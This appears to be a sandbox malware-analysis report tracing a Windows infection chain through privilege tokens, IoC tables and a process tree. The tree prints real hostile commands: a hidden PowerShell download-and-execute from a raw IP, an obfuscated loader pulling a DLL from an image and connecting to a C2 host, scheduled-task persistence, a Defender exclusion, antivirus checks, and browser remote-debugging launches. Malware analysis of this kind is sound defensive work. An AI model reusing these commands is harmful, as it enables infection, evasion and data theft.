Token: SeDebugPrivilege	5512	powershell.exe
Token: SeShutdownPrivilege	3512	chrome.exe
Token: SeCreatePagefilePrivilege	3512	chrome.exe
Token: SeShutdownPrivilege	3512	chrome.exe
Token: SeCreatePagefilePrivilege	3512	chrome.exe
Token: SeShutdownPrivilege	3512	chrome.exe
Token: SeCreatePagefilePrivilege	3512	chrome.exe
Token: SeDebugPrivilege	6040	powershell.exe
Token: SeDebugPrivilege	296	windowscore.exe
Token: SeDebugPrivilege	5860	powershell.exe
Token: SeDebugPrivilege	5860	powershell.exe
Token: SeDebugPrivilege	1416	0000003619.exe
Token: SeDebugPrivilege	7068	powershell.exe
Token: SeDebugPrivilege	7164	powershell.exe
Token: SeIncreaseQuotaPrivilege	6040	powershell.exe
Token: SeSecurityPrivilege	6040	powershell.exe
Token: SeTakeOwnershipPrivilege	6040	powershell.exe
Token: SeLoadDriverPrivilege	6040	powershell.exe
Token: SeSystemProfilePrivilege	6040	powershell.exe
Token: SeSystemtimePrivilege	6040	powershell.exe
Token: SeProfSingleProcessPrivilege	6040	powershell.exe
Token: SeIncBasePriorityPrivilege	6040	powershell.exe
Token: SeCreatePagefilePrivilege	6040	powershell.exe
Token: SeBackupPrivilege	6040	powershell.exe
Token: SeRestorePrivilege	6040	powershell.exe
Token: SeShutdownPrivilege	6040	powershell.exe
Token: SeDebugPrivilege	6040	powershell.exe
Token: SeSystemEnvironmentPrivilege	6040	powershell.exe
Token: SeRemoteShutdownPrivilege	6040	powershell.exe
Token: SeUndockPrivilege	6040	powershell.exe
Token: SeManageVolumePrivilege	6040	powershell.exe
Token: 33	6040	powershell.exe
Token: 34	6040	powershell.exe
Token: 35	6040	powershell.exe
Token: 36	6040	powershell.exe
Token: SeDebugPrivilege	2780	powershell.exe

Suspicious use of FindShellTrayWindow 38 IoCs

pid	Process
4408	random.exe
4408	random.exe
4408	random.exe
3500	TempZIZM8UZIAEHDUJF4V3RM05DC4B2HIY0J.EXE
388	Organizations.com
388	Organizations.com
388	Organizations.com
3512	chrome.exe
3512	chrome.exe
3512	chrome.exe
3512	chrome.exe
3512	chrome.exe
3512	chrome.exe
3512	chrome.exe
3512	chrome.exe
3512	chrome.exe
3512	chrome.exe
3512	chrome.exe
3512	chrome.exe
3512	chrome.exe
3512	chrome.exe
3512	chrome.exe
3512	chrome.exe
3512	chrome.exe
3512	chrome.exe
3512	chrome.exe
3512	chrome.exe
3512	chrome.exe
3512	chrome.exe
3512	chrome.exe
3512	chrome.exe
3512	chrome.exe
3512	chrome.exe
5528	msedge.exe
5528	msedge.exe
1584	02221f1f23.exe
1584	02221f1f23.exe
1584	02221f1f23.exe

Suspicious use of SendNotifyMessage 9 IoCs

pid	Process
4408	random.exe
4408	random.exe
4408	random.exe
388	Organizations.com
388	Organizations.com
388	Organizations.com
1584	02221f1f23.exe
1584	02221f1f23.exe
1584	02221f1f23.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4408 wrote to memory of 2828	4408	random.exe	86
PID 4408 wrote to memory of 2828	4408	random.exe	86
PID 4408 wrote to memory of 2828	4408	random.exe	86
PID 4408 wrote to memory of 3344	4408	random.exe	87
PID 4408 wrote to memory of 3344	4408	random.exe	87
PID 4408 wrote to memory of 3344	4408	random.exe	87
PID 2828 wrote to memory of 1584	2828	cmd.exe	89
PID 2828 wrote to memory of 1584	2828	cmd.exe	89
PID 2828 wrote to memory of 1584	2828	cmd.exe	89
PID 3344 wrote to memory of 3708	3344	mshta.exe	91
PID 3344 wrote to memory of 3708	3344	mshta.exe	91
PID 3344 wrote to memory of 3708	3344	mshta.exe	91
PID 3708 wrote to memory of 3500	3708	powershell.exe	100
PID 3708 wrote to memory of 3500	3708	powershell.exe	100
PID 3708 wrote to memory of 3500	3708	powershell.exe	100
PID 3500 wrote to memory of 4652	3500	TempZIZM8UZIAEHDUJF4V3RM05DC4B2HIY0J.EXE	101
PID 3500 wrote to memory of 4652	3500	TempZIZM8UZIAEHDUJF4V3RM05DC4B2HIY0J.EXE	101
PID 3500 wrote to memory of 4652	3500	TempZIZM8UZIAEHDUJF4V3RM05DC4B2HIY0J.EXE	101
PID 4652 wrote to memory of 3128	4652	rapes.exe	104
PID 4652 wrote to memory of 3128	4652	rapes.exe	104
PID 3128 wrote to memory of 1888	3128	50KfF6O.exe	106
PID 3128 wrote to memory of 1888	3128	50KfF6O.exe	106
PID 4652 wrote to memory of 1752	4652	rapes.exe	107
PID 4652 wrote to memory of 1752	4652	rapes.exe	107
PID 4652 wrote to memory of 1752	4652	rapes.exe	107
PID 1752 wrote to memory of 4560	1752	zx4PJh6.exe	108
PID 1752 wrote to memory of 4560	1752	zx4PJh6.exe	108
PID 1752 wrote to memory of 4560	1752	zx4PJh6.exe	108
PID 4560 wrote to memory of 1932	4560	CMD.exe	111
PID 4560 wrote to memory of 1932	4560	CMD.exe	111
PID 4560 wrote to memory of 1932	4560	CMD.exe	111
PID 4560 wrote to memory of 2924	4560	CMD.exe	112
PID 4560 wrote to memory of 2924	4560	CMD.exe	112
PID 4560 wrote to memory of 2924	4560	CMD.exe	112
PID 4560 wrote to memory of 2044	4560	CMD.exe	113
PID 4560 wrote to memory of 2044	4560	CMD.exe	113
PID 4560 wrote to memory of 2044	4560	CMD.exe	113
PID 4560 wrote to memory of 2480	4560	CMD.exe	114
PID 4560 wrote to memory of 2480	4560	CMD.exe	114
PID 4560 wrote to memory of 2480	4560	CMD.exe	114
PID 4560 wrote to memory of 4324	4560	CMD.exe	115
PID 4560 wrote to memory of 4324	4560	CMD.exe	115
PID 4560 wrote to memory of 4324	4560	CMD.exe	115
PID 4560 wrote to memory of 684	4560	CMD.exe	116
PID 4560 wrote to memory of 684	4560	CMD.exe	116
PID 4560 wrote to memory of 684	4560	CMD.exe	116
PID 4560 wrote to memory of 1480	4560	CMD.exe	118
PID 4560 wrote to memory of 1480	4560	CMD.exe	118
PID 4560 wrote to memory of 1480	4560	CMD.exe	118
PID 4560 wrote to memory of 228	4560	CMD.exe	119
PID 4560 wrote to memory of 228	4560	CMD.exe	119
PID 4560 wrote to memory of 228	4560	CMD.exe	119
PID 4560 wrote to memory of 2832	4560	CMD.exe	120
PID 4560 wrote to memory of 2832	4560	CMD.exe	120
PID 4560 wrote to memory of 2832	4560	CMD.exe	120
PID 4560 wrote to memory of 388	4560	CMD.exe	121
PID 4560 wrote to memory of 388	4560	CMD.exe	121
PID 4560 wrote to memory of 388	4560	CMD.exe	121
PID 4560 wrote to memory of 1572	4560	CMD.exe	122
PID 4560 wrote to memory of 1572	4560	CMD.exe	122
PID 4560 wrote to memory of 1572	4560	CMD.exe	122
PID 4652 wrote to memory of 2128	4652	rapes.exe	130
PID 4652 wrote to memory of 2128	4652	rapes.exe	130
PID 4652 wrote to memory of 2128	4652	rapes.exe	130

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
1888	attrib.exe

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2656
- C:\Windows\SysWOW64\fontdrvhost.exe
  "C:\Windows\System32\fontdrvhost.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:4480

C:\Users\Admin\AppData\Local\Temp\random.exe
"C:\Users\Admin\AppData\Local\Temp\random.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4408
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /create /tn Ncbtima9yrF /tr "mshta C:\Users\Admin\AppData\Local\Temp\TAHntenyl.hta" /sc minute /mo 25 /ru "Admin" /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2828
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /tn Ncbtima9yrF /tr "mshta C:\Users\Admin\AppData\Local\Temp\TAHntenyl.hta" /sc minute /mo 25 /ru "Admin" /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:1584
- C:\Windows\SysWOW64\mshta.exe
  mshta C:\Users\Admin\AppData\Local\Temp\TAHntenyl.hta
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3344
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'ZIZM8UZIAEHDUJF4V3RM05DC4B2HIY0J.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3708
  - - C:\Users\Admin\AppData\Local\TempZIZM8UZIAEHDUJF4V3RM05DC4B2HIY0J.EXE
      "C:\Users\Admin\AppData\Local\TempZIZM8UZIAEHDUJF4V3RM05DC4B2HIY0J.EXE"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      Suspicious use of WriteProcessMemory
      PID:3500
    - - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Downloads MZ/PE file
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Adds Run key to start application
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:4652
      - C:\Users\Admin\AppData\Local\Temp\10283690101\50KfF6O.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10283690101\50KfF6O.exe"
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3128
        
        C:\Windows\system32\attrib.exe
        
        attrib +h +s C:\Users\Admin\AppData\Local\Temp\10283690101\50KfF6O.exe
        7⤵
        Views/modifies file attributes
        
        PID:1888
      - C:\Users\Admin\AppData\Local\Temp\10286670101\zx4PJh6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10286670101\zx4PJh6.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1752
        
        C:\Windows\SysWOW64\CMD.exe
        
        "C:\Windows\system32\CMD.exe" /c copy Spare.wmv Spare.wmv.bat & Spare.wmv.bat
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4560
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:1932
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2924
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2044
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2480
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 440824
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4324
        
        C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Architecture.wmv
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:684
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "Offensive" Inter
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1480
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 440824\Organizations.com + Flexible + Damn + Hard + College + Corp + Cj + Boulevard + Drainage + Truth 440824\Organizations.com
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:228
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Dancing.wmv + ..\Ka.wmv + ..\Bali.wmv + ..\Liability.wmv + ..\Lamps.wmv + ..\Electro.wmv + ..\Shakespeare.wmv + ..\Make.wmv + ..\Physiology.wmv + ..\Witness.wmv + ..\Submitting.wmv + ..\Bd.wmv h
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2832
        
        C:\Users\Admin\AppData\Local\Temp\440824\Organizations.com
        
        Organizations.com h
        8⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:388
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 388 -s 944
        9⤵
        Program crash
        
        PID:4584
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1572
      - C:\Users\Admin\AppData\Local\Temp\10286880101\k3t05Da.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10286880101\k3t05Da.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Loads dropped DLL
        Checks whether UAC is enabled
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2128
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\File.bat" "
        7⤵
        Drops startup file
        System Location Discovery: System Language Discovery
        
        PID:4644
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command "$base64Url = 'aHR0cDovLzE5Ni4yNTEuOTEuNDIvdXAvdXBsb2Fkcy9lbmNyeXB0aW9uMDIuanBn'; $url = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($base64Url)); $webClient = New-Object System.Net.WebClient; $imageBytes = $webClient.DownloadData($url); $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); $startIndex -ge 0 -and $endIndex -gt $startIndex; $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $dllBytes = [Convert]::FromBase64String($base64Command); $assembly = [System.Reflection.Assembly]::Load($dllBytes); [Stub.main]::Main('httpss.myvnc.com', '1907');"
        8⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3708
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\ohbuGGy.exe"
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:816
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ohbuGGy" /XML "C:\Users\Admin\AppData\Local\Temp\tmp9C89.tmp"
        7⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:3400
        
        C:\Users\Admin\AppData\Local\Temp\10286880101\k3t05Da.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10286880101\k3t05Da.exe"
        7⤵
        Executes dropped EXE
        
        PID:2392
        
        C:\Users\Admin\AppData\Local\Temp\10286880101\k3t05Da.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10286880101\k3t05Da.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:4560
      - C:\Users\Admin\AppData\Local\Temp\10287840101\advnrNo.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10287840101\advnrNo.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:5076
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        7⤵
        Uses browser remote debugging
        Checks processor information in registry
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:3512
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe5b2ddcf8,0x7ffe5b2ddd04,0x7ffe5b2ddd10
        8⤵
        
        PID:372
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1980,i,7228264492649854462,12807232674645293032,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1976 /prefetch:2
        8⤵
        
        PID:4504
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1544,i,7228264492649854462,12807232674645293032,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2232 /prefetch:3
        8⤵
        
        PID:4604
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2348,i,7228264492649854462,12807232674645293032,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2364 /prefetch:8
        8⤵
        
        PID:1816
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3204,i,7228264492649854462,12807232674645293032,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3216 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:4672
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3224,i,7228264492649854462,12807232674645293032,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3276 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:1084
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4240,i,7228264492649854462,12807232674645293032,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4284 /prefetch:2
        8⤵
        Uses browser remote debugging
        
        PID:2536
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4252,i,7228264492649854462,12807232674645293032,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4676 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:5180
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5144,i,7228264492649854462,12807232674645293032,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5160 /prefetch:8
        8⤵
        
        PID:5660
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5448,i,7228264492649854462,12807232674645293032,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5460 /prefetch:8
        8⤵
        
        PID:5848
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        7⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        
        PID:5528
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x24c,0x7ffe5a43f208,0x7ffe5a43f214,0x7ffe5a43f220
        8⤵
        
        PID:5544
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1944,i,13335297704204300032,6242055348990662797,262144 --variations-seed-version --mojo-platform-channel-handle=2236 /prefetch:3
        8⤵
        
        PID:5344
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2208,i,13335297704204300032,6242055348990662797,262144 --variations-seed-version --mojo-platform-channel-handle=2204 /prefetch:2
        8⤵
        
        PID:768
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2528,i,13335297704204300032,6242055348990662797,262144 --variations-seed-version --mojo-platform-channel-handle=1880 /prefetch:8
        8⤵
        
        PID:5700
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3548,i,13335297704204300032,6242055348990662797,262144 --variations-seed-version --mojo-platform-channel-handle=3576 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:1020
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3564,i,13335297704204300032,6242055348990662797,262144 --variations-seed-version --mojo-platform-channel-handle=3580 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:5144
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4184,i,13335297704204300032,6242055348990662797,262144 --variations-seed-version --mojo-platform-channel-handle=4220 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:732
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4212,i,13335297704204300032,6242055348990662797,262144 --variations-seed-version --mojo-platform-channel-handle=4224 /prefetch:2
        8⤵
        Uses browser remote debugging
        
        PID:4492
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3744,i,13335297704204300032,6242055348990662797,262144 --variations-seed-version --mojo-platform-channel-handle=5200 /prefetch:8
        8⤵
        
        PID:4060
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3720,i,13335297704204300032,6242055348990662797,262144 --variations-seed-version --mojo-platform-channel-handle=5148 /prefetch:8
        8⤵
        
        PID:6008
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5380,i,13335297704204300032,6242055348990662797,262144 --variations-seed-version --mojo-platform-channel-handle=3620 /prefetch:8
        8⤵
        
        PID:1144
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
